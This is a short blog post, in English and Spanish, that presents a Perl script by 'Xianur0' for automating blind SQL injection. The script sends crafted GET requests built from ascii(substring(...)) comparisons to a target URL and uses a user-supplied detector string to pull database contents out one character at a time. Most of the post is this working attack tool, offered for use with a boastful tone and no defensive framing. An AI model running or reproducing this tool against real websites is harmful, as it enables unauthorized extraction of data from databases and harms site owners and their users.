Blog de Xianur0

Simplifier Blind SQL Injection By Xianur0

Posted on 17:02 by Xianur0

English: This tool converts Bug Blind SQL Injection in a SQL Injection ordinary and gives you data output that is not limited only to Boolean jaja

Spanish: Esta tool simplemente convierte los bugs Blind SQL Injection en SQL Injection comunes y te da salida de datos que no solo se limitan a booleanos jejejejeje.

Una Obra Maestra :P
A Masterpiece :P


#!/usr/bin/perl

#Xianur0 CYS # perl injector.pl http://www.vuln.com/vuln.php?id=1
#
#Blind SQL Injection converter to SQL Injection
#
#Please Have Patience, running.........
#pma@localhost
#
#
#Finished!
#


# By Xianur0

  use LWP::UserAgent;
$debugmode = "false";
  $ua = LWP::UserAgent->new;
  $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$url = $ARGV[0] || die("Use: SQL.pl [URI]\nExample: sql.pl http://www.vuln.com/vuln.php?id=1\n");
print "\nBlind SQL Injection converter to SQL Injection By Xianur0\n\n";
print "\nEnter the SQL Injection please:\n";
$sql=<STDIN>;
chop($sql);
print "\nEnter the Detector please:\n";
$detector=<STDIN>;
chop($detector);
print "\nPlease Have Patience, running.........\n";
$caracter = 1;
$i=0;
$simbolo = ">";
while($caracter ne "finito") {
if($debugmode eq "true") { print $url.'/**/AND/**/ascii(substring(('.$sql.'),'.$caracter.',1))/**/'.$simbolo.'/**/'.$i."\n";}
  $req = HTTP::Request->new(GET => $url.'/**/AND/**/ascii(substring(('.$sql.'),'.$caracter.',1))/**/'.$simbolo.'/**/'.$i);
  $req->header('Accept' => 'text/html');
  $res = $ua->request($req);
  if ($res->is_success) {
     if($res->content !~ $detector) {
if($base eq $i) { print chr($i); $caracter++; $i=0; $simbolo = ">";}
$base = $i;
$i = $i+10;
} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";}
}
  } else {
     print "\nError detected in HTTP requests: " . $res->status_line . "!\n";
  }
}

print "\nFinished!\n";